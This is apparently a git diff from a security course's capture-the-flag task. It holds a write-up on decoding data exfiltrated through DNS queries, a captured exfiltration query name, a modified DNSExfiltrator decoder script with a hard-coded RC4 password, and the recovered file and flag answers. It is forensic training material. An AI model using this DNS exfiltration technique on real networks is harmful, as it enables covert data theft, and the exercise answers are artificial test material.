+Name: 0.EIu3wCinsPK_RDCVv5d-28e2TU-Ec1BHT83QblPN3mOo-L1-dXVkSPod7iTczcQ.tlULhh7p_QqO-k4FtUQ56nkbgIOkTNePAkkDmEWAggVL7hEcLJpKORiesVBGsol.AEJgjlMn2JczQo6KGqUAJ4GtnaXI3YZW7uEel8fq0kjjJvQfVhtbHHKyx9bEhJO.zxhc39atS4.securitytesting.online
+```
+
+We cloned the repository with DNSExfiltrator and modified the code a bit to decode our string with fix password
+without the need to run the whole process. After extracting the result zip file
+we get folder with one single file: test.txt with following content:
+
+```
+lalalala
+passwords: jkgjhqgfwgefjh
+```
+
+We then proceed to the flag server again, this time running on `192.168.1.167:8992`
+First question:
+
+```
+<Gimli> What is the name of the exfiltrated file?
+```
+
+we already know the answer, the extracted file is `test.txt`
+
+```
+<Gimli> What is the password inside the file?
+```
+
+Answer is in the file: `jkgjhqgfwgefjh`
+
+Answering these two questions was enough to get the flag:
+
+```
+<Gimli> Never thought I'd die fighting side by side with an Elf: BSY-FLAG-A09B-{...}
+```
+
+

BSY/bonus/extract/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx%3fcms_redirect=yes&ip=109.81.208.198&ipbits=0&mm=28&mn=sn-vufvj1-2gbe&ms=nvh&mt=1525240878&mv=m&pl=24&shardbypass=yes

@@ -0,0 +1,139 @@
+#!/usr/bin/python
+# -*- coding: utf8 -*-
+import argparse
+import socket
+from dnslib import *
+from base64 import b64decode, b32decode
+import sys
+
+#======================================================================================================
+#                                            HELPERS FUNCTIONS
+#======================================================================================================
+
+#------------------------------------------------------------------------
+# Class providing RC4 encryption/decryption functions
+#------------------------------------------------------------------------
+class RC4:
+    def __init__(self, key = None):
+        self.state = range(256) # initialisation de la table de permutation
+        self.x = self.y = 0 # les index x et y, au lieu de i et j
+
+        if key is not None:
+            self.key = key
+            self.init(key)
+
+    # Key schedule
+    def init(self, key):
+        for i in range(256):
+            self.x = (ord(key[i % len(key)]) + self.state[i] + self.x) & 0xFF
+            self.state[i], self.state[self.x] = self.state[self.x], self.state[i]
+        self.x = 0
+
+    # Decrypt binary input data
+    def binaryDecrypt(self, data):
+        output = [None]*len(data)
+        for i in range(len(data)):
+            self.x = (self.x + 1) & 0xFF
+            self.y = (self.state[self.x] + self.y) & 0xFF
+            self.state[self.x], self.state[self.y] = self.state[self.y], self.state[self.x]
+            output[i] = (data[i] ^ self.state[(self.state[self.x] + self.state[self.y]) & 0xFF])
+        return bytearray(output)
+        
+#------------------------------------------------------------------------
+def progress(count, total, status=''):
+    """
+    Print a progress bar - https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
+    """
+    bar_len = 60
+    filled_len = int(round(bar_len * count / float(total)))
+
+    percents = round(100.0 * count / float(total), 1)
+    bar = '=' * filled_len + '-' * (bar_len - filled_len)
+    sys.stdout.write('[%s] %s%s\t%s\t\r' % (bar, percents, '%', status))
+    sys.stdout.flush()
+
+#------------------------------------------------------------------------
+def fromBase64URL(msg):
+    msg = msg.replace('_','/').replace('-','+')
+    if len(msg)%4 == 3:
+        return b64decode(msg + '=')
+    elif len(msg)%4 == 2:
+        print(msg)
+        return b64decode(msg + '==')
+    else:
+        return b64decode(msg)
+
+#------------------------------------------------------------------------
+def fromBase32(msg):
+    # Base32 decoding, we need to add the padding back
+    # Add padding characters
+    mod = len(msg) % 8
+    if mod == 2:
+        padding = "======"
+    elif mod == 4:
+        padding = "===="
+    elif mod == 5:
+        padding = "==="
+    elif mod == 7:
+        padding = "="
+    else:
+        padding = ""
+
+    return b32decode(msg.upper() + padding)
+
+            
+#------------------------------------------------------------------------
+def color(string, color=None):
+    """
+    Author: HarmJ0y, borrowed from Empire
+    Change text color for the Linux terminal.
+    """
+    
+    attr = []
+    # bold
+    attr.append('1')
+    
+    if color:
+        if color.lower() == "red":
+            attr.append('31')
+        elif color.lower() == "green":
+            attr.append('32')
+        elif color.lower() == "blue":
+            attr.append('34')
+        return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
+
+    else:
+        if string.strip().startswith("[!]"):
+            attr.append('31')
+            return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
+        elif string.strip().startswith("[+]"):
+            attr.append('32')
+            return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
+        elif string.strip().startswith("[?]"):
+            attr.append('33')
+            return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
+        elif string.strip().startswith("[*]"):
+            attr.append('34')
+            return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
+        else:
+            return string
+
+#======================================================================================================
+#                                            MAIN FUNCTION
+#======================================================================================================
+if __name__ == '__main__':
+    password = 'pass'
+    outputFileName = "out.zip"
+    try:
+        # Create and initialize the RC4 decryptor object
+        rc4Decryptor = RC4(password)
+
+        # Save data to a file
+        print(color("[+] Decrypting using password [{}] and saving to output file [{}]".format(password, outputFileName)))
+        with open(outputFileName, 'wb+') as fileHandle:
+            fileHandle.write(rc4Decryptor.binaryDecrypt(bytearray(fromBase64URL(
+                                                                  "EIu3wCinsPK_RDCVv5d-28e2TU-Ec1BHT83QblPN3mOo-L1-dXVkSPod7iTczcQ.tlULhh7p_QqO-k4FtUQ56nkbgIOkTNePAkkDmEWAggVL7hEcLJpKORiesVBGsol.AEJgjlMn2JczQo6KGqUAJ4GtnaXI3YZW7uEel8fq0kjjJvQfVhtbHHKyx9bEhJO.zxhc39atS4".replace('.','')))))
+            fileHandle.close()
+            print(color("[+] Output file [{}] saved successfully".format(outputFileName)))
+    except IOError:
+        print(color("[!] Could not write file [{}]".format(outputFileName)))

BSY/bonus/extract/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx%3fcms_redirect=yes&ip=109.81.208.198&ipbits=0&mm=28&mn=sn-vufvj1-2gbe&ms=nvh&mt=1525240939&mv=m&pl=24&shardbypass=yes

@@ -0,0 +1,2 @@
+lalalala
+passwords: jkgjhqgfwgefjh